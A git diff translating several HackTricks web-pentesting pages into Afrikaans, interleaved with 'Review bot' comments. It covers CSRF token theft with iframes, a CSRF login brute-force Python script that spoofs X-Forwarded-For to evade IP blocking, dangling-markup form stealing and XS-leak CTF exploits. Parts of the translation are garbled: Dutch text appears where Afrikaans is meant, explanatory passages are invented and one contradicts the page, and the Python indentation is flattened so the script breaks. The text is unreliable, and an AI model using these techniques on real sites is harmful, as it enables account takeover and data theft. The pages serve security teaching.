+ ``` + +3. Gebruik JavaScript om die vorm binne die iframe te stuur sodra die iframe gelaai is. Hierdie stap verseker dat die POST-aanvraag outomaties uitgevoer word sonder enige interaksie van die gebruiker. + + ```html + + ``` + +Met hierdie metode sal die gesteelde CSRF-token gebruik word om 'n POST-aanvraag na die doelwitwebwerf te stuur sonder dat die gebruiker daarvan bewus is. Dit kan gebruik word om skadelike aksies uit te voer namens die gebruiker, soos die verander van wagwoorde of die stuur van valse inligting. ```html - ``` +### **Steel token en stuur dit deur gebruik te maak van 2 iframes** -### **Steal token and send it using 2 iframes** +Om een CSRF-aanval (Cross-Site Request Forgery) uit te voeren, moet je eerst het CSRF-token stelen van het doelwit. Dit token wordt meestal opgeslagen in een cookie of een verborgen veld in een formulier. Nadat je het token hebt verkregen, kun je het gebruiken om een vervalste aanvraag naar de doelwebsite te sturen. +Een manier om het gestolen token te verzenden, is door gebruik te maken van twee iframes. Het eerste iframe wordt gebruikt om het CSRF-formulier te laden, terwijl het tweede iframe wordt gebruikt om de vervalste aanvraag te verzenden. + +Hier is een voorbeeld van hoe je dit kunt doen: + +```html + + + + +``` + +In dit voorbeeld wordt ervan uitgegaan dat het CSRF-formulier wordt geladen vanaf `https://www.example.com/csrf-form` en het vervalste verzoek wordt verzonden naar `https://www.example.com/submit`. Zorg ervoor dat je de juiste URL's gebruikt voor jouw specifieke doelwit. + +Merk op dat deze techniek mogelijk niet werkt als de doelwebsite maatregelen heeft genomen om CSRF-aanvallen te voorkomen, zoals het gebruik van anti-CSRF-tokens die per sessie veranderen. Het is belangrijk om altijd de beveiligingsmaatregelen van het doelwit te evalueren voordat je een CSRF-aanval uitvoert. ```html - -
- - - - + + + +
``` - -### **POSTSteal CSRF token with Ajax and send a post with a form** - +### **POSTSteel CSRF-token met Ajax en stuur 'n pos met 'n vorm** ```html
- - - - + + + +
``` +### CSRF met Socket.IO -### CSRF with Socket.IO +Socket.IO is 'n JavaScript-biblioteek wat gebruik word vir die ontwikkeling van real-time toepassings. Dit maak gebruik van WebSockets om 'n permanente verbinding tussen die bediener en die kliënt te skep. Hierdie permanente verbinding kan egter 'n veiligheidsrisiko inhou, veral as dit nie behoorlik beskerm word teen Cross-Site Request Forgery (CSRF) aanvalle nie. +CSRF is 'n aanvalstegniek waar 'n aanvaller 'n kliënt se vertroue in 'n webtoepassing misbruik om ongewenste aksies namens die kliënt uit te voer. Met Socket.IO kan 'n CSRF-aanval plaasvind deur 'n kwaadwillige webwerf te skep wat 'n Socket.IO-verbinding met die doelwitwebwerf tot stand bring. As die kliënt reeds 'n geldige sessie het met die doelwitwebwerf, sal die Socket.IO-verbinding ook geldig wees. Die kwaadwillige webwerf kan dan gebruik maak van die Socket.IO-verbinding om ongewenste aksies uit te voer namens die kliënt. + +Om Socket.IO te beskerm teen CSRF-aanvalle, kan die volgende maatreëls geneem word: + +1. **Verifikasie van oorsprong**: Die doelwitwebwerf kan die oorsprong van inkomende Socket.IO-verbindings verifieer om te verseker dat dit afkomstig is van 'n vertroude bron. Dit kan gedoen word deur die `origin`-veld in die HTTP-kop van die inkomende verbindingsversoek te ontleed en te vergelyk met 'n lys vertroude oorspronge. + +2. **Gebruik van CSRF-token**: Die doelwitwebwerf kan 'n CSRF-token genereer en dit aan die kliënt stuur as 'n koekie of deel van die Socket.IO-verbindingsversoek. Die kliënt moet dan die CSRF-token insluit in elke Socket.IO-verbindingsversoek. Die doelwitwebwerf kan die ontvangste CSRF-token vergelyk met die verwagte waarde om te verseker dat die versoek geldig is. + +3. **Verifikasie van sessie**: Die doelwitwebwerf kan die sessie van die kliënt verifieer voordat dit enige aksies toelaat wat deur die Socket.IO-verbinding uitgevoer word. 
Dit kan gedoen word deur die sessie-identifiseerder te vergelyk wat in die Socket.IO-verbindingsversoek gestuur word met die sessie-identifiseerder wat geassosieer word met die kliënt se sessie. + +Deur hierdie maatreëls te implementeer, kan die risiko van CSRF-aanvalle met Socket.IO verminder word en die veiligheid van die webtoepassing verhoog word. ```html ``` - ## CSRF Login Brute Force -The code can be used to Brut Force a login form using a CSRF token (It's also using the header X-Forwarded-For to try to bypass a possible IP blacklisting): - +Die kode kan gebruik word om 'n login-vorm te Brut Force met behulp van 'n CSRF-token (Dit maak ook gebruik van die X-Forwarded-For-kop om te probeer om 'n moontlike IP-swartlys te omseil): ```python import request import re 
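Review bot: the paragraphs added under `+### **Steel token en stuur dit deur gebruik te maak van 2 iframes**` are Dutch, not Afrikaans (`Om een CSRF-aanval ... uit te voeren, moet je eerst het CSRF-token stelen van het doelwit`, `Zorg ervoor dat je de juiste URL's gebruikt`), and, like the three-step walkthrough under the iframe-and-form heading and the explanatory paragraphs under `### CSRF met Socket.IO`, they have no source: the `-` side shows only the headings. They also introduce example URLs (`https://www.example.com/csrf-form`, `https://www.example.com/submit`) and nested ```html fences inside numbered list items that the original file never contained. All of this invented material should be removed so the file stays a line-for-line translation. Three smaller points in the same hunk: `+### **POSTSteel CSRF-token met Ajax en stuur 'n pos met 'n vorm**` carries over the stray `POST` glued to the English heading `POSTSteal ...` and renders "a post" as `'n pos` (mail); `### **Steel CSRF-token met Ajax en stuur 'n POST-versoek met 'n vorm**` would be correct. The pre-existing typo `Brut Force` in the `## CSRF Login Brute Force` paragraph is reproduced as `te Brut Force` and should be `Brute Force` on both sides. Finally, `import request` in the context line before the next hunk does not match the `requests.get(...)` / `requests.post(...)` calls that follow; `import requests` is needed for the script to run at all.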
@@ -573,44 +721,43 @@ USER = "fergus" PASS_LIST="./words" def init_session(): - #Return CSRF + Session (cookie) - r = requests.get(URL) - csrf = re.search(r'input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="([a-zA-Z0-9]*)"', r.text) - csrf = csrf.group(1) - session_cookie = r.cookies.get(SESSION_COOKIE_NAME) - return csrf, session_cookie +#Return CSRF + Session (cookie) +r = requests.get(URL) +csrf = re.search(r'input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="([a-zA-Z0-9]*)"', r.text) +csrf = csrf.group(1) +session_cookie = r.cookies.get(SESSION_COOKIE_NAME) +return csrf, session_cookie def login(user, password): - print(f"{user}:{password}") - csrf, cookie = init_session() - cookies = {SESSION_COOKIE_NAME: cookie} - data = { - "tokenCSRF": csrf, - "username": user, - "password": password, - "save": "" - } - headers = { - "X-Forwarded-For": f"{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}" - } - r = requests.post(URL, data=data, cookies=cookies, headers=headers, proxies=PROXY) - if "Username or password incorrect" in r.text: - return False - else: - print(f"FOUND {user} : {password}") - return True +print(f"{user}:{password}") +csrf, cookie = init_session() +cookies = {SESSION_COOKIE_NAME: cookie} +data = { +"tokenCSRF": csrf, +"username": user, +"password": password, +"save": "" +} +headers = { +"X-Forwarded-For": f"{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}" +} +r = requests.post(URL, data=data, cookies=cookies, headers=headers, proxies=PROXY) +if "Username or password incorrect" in r.text: +return False +else: +print(f"FOUND {user} : {password}") +return True with open(PASS_LIST, "r") as f: - for line in f: - login(USER, line.strip()) +for line in f: +login(USER, line.strip()) ``` - -## Tools +## Gereedskap * [https://github.com/0xInfection/XSRFProbe](https://github.com/0xInfection/XSRFProbe) * 
[https://github.com/merttasci/csrf-poc-generator](https://github.com/merttasci/csrf-poc-generator) -## References +## Verwysings * [https://portswigger.net/web-security/csrf](https://portswigger.net/web-security/csrf) * [https://portswigger.net/web-security/csrf/bypassing-token-validation](https://portswigger.net/web-security/csrf/bypassing-token-validation) @@ -621,29 +768,29 @@ with open(PASS_LIST, "r") as f:
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutbeloningsjagters! **Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +Gaan in gesprek met inhoud wat die opwinding en uitdagings van hacking ondersoek **Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +Bly op hoogte van die vinnige wêreld van hacking deur middel van real-time nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste Aankondigings**\ +Bly ingelig met die nuutste foutbelonings wat bekendgestel word en noodsaaklike platform-opdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers!
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat** Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
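Review bot: in the `@@ -573,44 +721,43 @@` hunk the `+` lines of the Python block drop every level of indentation (`- r = requests.get(URL)` becomes `+r = requests.get(URL)` directly under `def init_session():`, and the bodies of `login`, the `if`/`else` and the `for line in f:` loop are flattened the same way). Unlike the JavaScript block earlier in this file, that is not cosmetic: Python defines blocks by indentation, so the translated script is a SyntaxError and the brute-force example no longer runs. The translation step must preserve fenced code byte-for-byte, and this block should be restored from the `-` side before the patch is merged. In the same pass it would be worth fixing the import mismatch visible just above the hunk header (`import request` versus `requests.get(URL)`), since the original is broken there too.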
diff --git a/pentesting-web/dangling-markup-html-scriptless-injection/README.md b/pentesting-web/dangling-markup-html-scriptless-injection/README.md index 9481c0842..05d036800 100644 --- a/pentesting-web/dangling-markup-html-scriptless-injection/README.md +++ b/pentesting-web/dangling-markup-html-scriptless-injection/README.md @@ -1,108 +1,111 @@ -# Dangling Markup - HTML scriptless injection +# Hangende Markup - HTML skriptlose inspuiting
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## Resume +## Opsomming -This technique can be use to extract information from a user when an **HTML injection is found**. This is very useful if you **don't find any way to exploit a** [**XSS** ](../xss-cross-site-scripting/)but you can **inject some HTML tags**.\ -It is also useful if some **secret is saved in clear text** in the HTML and you want to **exfiltrate** it from the client, or if you want to mislead some script execution. +Hierdie tegniek kan gebruik word om inligting van 'n gebruiker te onttrek wanneer 'n **HTML-inspuiting gevind word**. Dit is baie nuttig as jy **nie 'n manier vind om 'n** [**XSS** ](../xss-cross-site-scripting/)te benut nie, maar jy kan **'n paar HTML-etikette inspuit**.\ +Dit is ook nuttig as 'n **geheim in die HTML in duidelike teks bewaar word** en jy dit van die klient wil **uitvoer** of as jy 'n skripsie-uitvoering wil mislei. -Several techniques commented here can be used to bypass some [**Content Security Policy**](../content-security-policy-csp-bypass/) by exfiltrating information in unexpected ways (html tags, CSS, http-meta tags, forms, base...). +Verskeie tegnieke wat hier bespreek word, kan gebruik word om sekere [**Content Security Policy**](../content-security-policy-csp-bypass/) te omseil deur inligting op onverwagte maniere uit te voer (html-etikette, CSS, http-meta-etikette, vorms, basis...). -## Main Applications +## Hooftoepassings -### Stealing clear text secrets +### Steel duidelike teksgeheime -If you inject `@import//hackvertor.co.uk? <--- Injected steal me!; ``` - -You could also use **`test ``` +### Steel vorms -### Stealing forms +Hierdie tegniek maak gebruik van 'n kwesbaarheid genaamd "dangling markup" om vorminligting te steel van 'n webwerf. 'n Dangling markup verwys na HTML-kode wat nie korrek gekoppel is aan die res van die webwerf nie, maar steeds deur die webblaaier geïnterpreteer word. 
+Om vorminligting te steel, moet jy eers 'n vorm op die teikenwebwerf vind wat voldoen aan die volgende vereistes: + +- Die vorm moet 'n aksie-attribuut hê wat verwys na 'n eksterne webwerf of 'n ander domein. +- Die vorm moet 'n metode-attribuut hê wat ingestel is op "GET" of "POST". +- Die vorm moet 'n invoerveld hê wat geheime inligting bevat, soos 'n wagwoord of 'n kredietkaartnommer. + +As jy so 'n vorm vind, kan jy 'n aangepaste HTML-kode skep wat die vorminligting na jou eie webwerf stuur. Hier is die stappe wat jy kan volg: + +1. Skep 'n nuwe HTML-dokument met die aangepaste kode. +2. Stel die aksie-attribuut van die vorm in op jou eie webwerf se URL. +3. Stel die metode-attribuut van die vorm in op "POST" of "GET", afhangende van die oorspronklike vorm. +4. Voeg 'n invoerveld by wat die geheime inligting sal ontvang. +5. Stuur die aangepaste kode na die teikenwebwerf deur dit in te sluit in 'n kwesbare plek, soos 'n kommentaarveld of 'n onsigbare element. + +As 'n gebruiker die webwerf besoek en die vorm invul, sal die inligting na jou eie webwerf gestuur word in plaas van na die beoogde bestemming. Hierdie tegniek kan gebruik word om gevoelige inligting soos wagwoorde en kredietkaartnommers te steel. + +Dit is belangrik om te onthou dat die gebruik van hierdie tegniek onwettig is sonder toestemming van die eienaar van die teikenwebwerf. Dit word sterk aanbeveel om slegs etiese hacking-tegnieke te gebruik en om altyd die toepaslike wette en regulasies te volg. ```html ``` +Dan, die vorms wat data na 'n pad stuur (soos `
`) sal die data na die skadelike domein stuur. -Then, the forms that send data to path (like ``) will send the data to the malicious domain. +### Steel vorms 2 -### Stealing forms 2 +Stel 'n vormkop: `` dit sal die volgende vormkop oorskryf en al die data van die vorm sal na die aanvaller gestuur word. -Set a form header: `` this will overwrite the next form header and all the data from the form will be sent to the attacker. - -### Stealing forms 3 - -The button can change the URL where the information of the form is going to be sent with the attribute "formaction": +### Steel vorms 3 +Die knoppie kan die URL waar die inligting van die vorm gestuur gaan word, verander met die atribuut "formaction": ```html
-
- -
+ +
+ +
-
- -
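Review bot: in the `pentesting-web/dangling-markup-html-scriptless-injection/README.md` hunk, the section `+### Steel vorms` gains a long explanatory passage (a definition of "dangling markup", a three-item requirements list, a five-step procedure and a closing paragraph stating that using the technique without permission is illegal) that has no counterpart on the `-` side, where `### Stealing forms` is followed directly by the code. Besides being unsourced, the invented requirements contradict the page's own explanation one paragraph later, which says that forms posting to a path (`<form action="/..."`) are what end up sending data to the injected `<base>` target, not forms whose `action` already points at an external domain; the passage should be removed and only the heading translated. Terminology points worth fixing in the translated prose: `skripsie-uitvoering` renders "script execution" with the word for a thesis (`skrip-uitvoering` is meant); `basis` in `(html-etikette, CSS, http-meta-etikette, vorms, basis...)` translates the HTML tag name `base`, which should stay `base`; `klient` should be `kliënt` as used elsewhere in this patch; and `# Hangende Markup` translates a technique name that readers search for verbatim, so `# Dangling Markup - HTML skriptlose inspuiting` would be the better heading.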
- +let t = 0 +const round = 30 +setTimeout(async () => { +for(let i=0; i1) +let end = performance.now() +t += end - s +console.log(end - s) +} +const avg = t/round +send(str + "," + t + "," + "avg:" + avg) + +/* +I get this threshold(1000ms) by trying multiple times on remote admin bot +for example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold +*/ +const isFound = (t >= 1000) +if (isFound) { +inp2.value = "0" +} else { +inp2.value = "1" +} + +// remember to delete the post to not break our leak oracle +f2.submit() +setTimeout(() => { +resolve(isFound) +}, 200) +}, 200) +} + + ``` +## DiceCTF 2022 - wortel -## DiceCTF 2022 - carrot +In hierdie geval was die eerste stap van die uitbuiting om 'n CSRF te misbruik om die bladsy waar die vlag bevat word te wysig sodat dit **veel meer inhoud** het (en dit neem dus langer om te laai), en dan **die verbindingspoel misbruik om die tyd te meet wat dit neem om toegang tot die bladsy te verkry** wat moontlik die vlag kan bevat. -In this case the first step of the exploit was to abuse a CSRF to modify the page where the flag is contained so it has **much more content** (and therefore loading it takes more time), and then **abuse the connection pool to measure the time it takes to access the page** that could be potentially having the flag. - -In the exploit you can see: - -* Abuse CSRF -* Occupy all the sockets but 1 -* Calibrate the response -* Start bruteforcing by accessing the potential page with the flag - * The potential page will be accessed and immediately an attackers controlled URL will also be accessed to check how much time both requests take. +In die uitbuiting kan jy sien: +* Misbruik CSRF +* Beset al die sokkels behalwe een +* Kalibreer die respons +* Begin bruteforce deur toegang te verkry tot die potensiële bladsy met die vlag +* Die potensiële bladsy sal toegang verkry word en onmiddellik sal 'n aanvallersbeheerde URL ook toegang verkry word om te kyk hoeveel tyd beide versoek neem. ```html

DiceCTF 2022 web/carrot

@@ -326,13 +321,13 @@ In the exploit you can see:


``` - - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md b/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md index 999601fab..0bdb44066 100644 --- a/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md +++ b/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md @@ -1,82 +1,74 @@ -# Cookie Bomb + Onerror XS Leak +# Koekiebom + Onerror XS-lek
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**hacktricks-repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud-repo**](https://github.com/carlospolop/hacktricks-cloud).
-The following **script** taken from [**here**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/) is exploiting a functionality that allows the user to **insert any amount of cookies**, and then loading a file as a script knowing that the true response will be larger than the false one and then. If successful, the response is a redirect with a resulting URL longer, **too large to handle by the server so return an error http status code**. If the search fails, nothing will happen because URL is short. - +Die volgende **skripsie** geneem vanaf [**hier**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/) maak gebruik van 'n funksionaliteit wat die gebruiker toelaat om **enige hoeveelheid koekies in te voeg**, en dan 'n lêer as 'n skripsie te laai met die wete dat die ware respons groter sal wees as die valse een en dan. As dit suksesvol is, is die respons 'n omleiding met 'n resulterende URL wat langer is, **te groot om deur die bediener hanteer te word, dus gee 'n fout HTTP-statuskode terug**. As die soektog misluk, sal niks gebeur nie omdat die URL kort is. ```html <>'";
``` - - - - - - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**hacktricks-repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud-repo**](https://github.com/carlospolop/hacktricks-cloud).
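Review bot: in the `pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md` hunk, "script" is translated as `skripsie` (a thesis) in both `Die volgende **skripsie** geneem vanaf ...` and `'n lêer as 'n skripsie te laai`; `skrip` is the intended word. The source sentence is itself broken (`larger than the false one and then.` ends mid-thought) and the translation reproduces the defect as `groter sal wees as die valse een en dan.`; either complete the English sentence first or at least drop the trailing `en dan` so the Afrikaans reads cleanly. `# Koekiebom + Onerror XS-lek` translates the technique name "Cookie Bomb", which readers look up verbatim; keeping `Cookie Bomb` in the heading, as `Onerror` and `XS` are kept, would be consistent.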
diff --git a/pentesting-web/xs-search/css-injection/README.md b/pentesting-web/xs-search/css-injection/README.md index 93179e864..2cbaf95f8 100644 --- a/pentesting-web/xs-search/css-injection/README.md +++ b/pentesting-web/xs-search/css-injection/README.md @@ -1,106 +1,97 @@ -# CSS Injection +# CSS Injeksie
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
